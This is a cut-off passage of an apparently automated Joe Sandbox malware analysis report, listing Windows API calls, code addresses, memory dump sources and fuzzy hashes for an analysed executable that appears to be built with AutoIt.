                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                              • String ID:
                                                                              • API String ID: 4046560759-0
                                                                              • Opcode ID: f1dcb639eea8d90ae34e050d64b0ddba3d3a8ac6fd9179947004fb3c6f1f970b
                                                                              • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                              • Opcode Fuzzy Hash: f1dcb639eea8d90ae34e050d64b0ddba3d3a8ac6fd9179947004fb3c6f1f970b
                                                                              • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
APIs
• VariantInit.OLEAUT32(?), ref: 0045EF06
• VariantClear.OLEAUT32(00000013), ref: 0045EF78
• VariantClear.OLEAUT32(00000000), ref: 0045EFD3
• _memmove.LIBCMT ref: 0045EFFD
• VariantClear.OLEAUT32(?), ref: 0045F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
• Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
• Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
• Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
APIs
• _memset.LIBCMT ref: 00462258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
• IsMenu.USER32(00000000), ref: 004622C3
• CreatePopupMenu.USER32 ref: 004622F7
• GetMenuItemCount.USER32(000000FF), ref: 00462355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
• Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
• Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
• Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
APIs
• ShowWindow.USER32(004C57B0,00000000,00A5C970,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
• EnableWindow.USER32(00000000,00000000), ref: 0048B736
• ShowWindow.USER32(004C57B0,00000000,00A5C970,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
• ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
• EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
• Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
• Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
• Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
  • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
• GetDesktopWindow.USER32 ref: 004770D6
• GetWindowRect.USER32(00000000), ref: 004770DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
  • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
• GetCursorPos.USER32(?), ref: 0047713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
• Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
• Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
• Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
APIs
  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
  • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
  • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
  • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
• GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
• HeapAlloc.KERNEL32(00000000), ref: 004588DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
• GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
• HeapFree.KERNEL32(00000000), ref: 00458911
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
• Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
• Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
• Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
• OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
• CloseHandle.KERNEL32(00000004), ref: 00458603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
• Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
• Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
• Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
APIs
Memory Dump Source
• Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 44d819e571c598b199d798392a32077c6161e4a562c2913c3869324d17ad7c4b
• Instruction ID: e7cba0e32a71c27194ab0274794a6472bb33f7cabf31f05130942fb3ee4da32d
• Opcode Fuzzy Hash: 44d819e571c598b199d798392a32077c6161e4a562c2913c3869324d17ad7c4b
• Instruction Fuzzy Hash: 64F0D136A8573426D32136756C08F2B36979FC2BE2B240724FF1E92280EF6998128950
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
• Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
• Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
• Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                              • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                              • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                              • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                              • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                              • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              APIs
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                                              • _memcmp.LIBCMT ref: 00457748
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                              • String ID: ,,I
                                                                              • API String ID: 314563124-4163367948
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 00478613
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                              • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              APIs
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                              • _memset.LIBCMT ref: 00462B87
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _memmove$_free
                                                                              • String ID: 3cA$_A
                                                                              • API String ID: 2620147621-3480954128
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _memset$_memmove
                                                                              • String ID: 3cA$ERCP
                                                                              • API String ID: 2532777613-1471582817
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004627C0
                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                              • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                              • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                              • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 365058703-1403004172
                                                                              • Opcode ID: a786e04d0636fba0514ea34886b01ca4770f42ad727f30dc04a261e3ff9ae3b8
                                                                              • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                              • Opcode Fuzzy Hash: a786e04d0636fba0514ea34886b01ca4770f42ad727f30dc04a261e3ff9ae3b8
                                                                              • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                              APIs
                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                              • DestroyWindow.USER32(?), ref: 00486485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                              • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                              • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                              • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                              • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
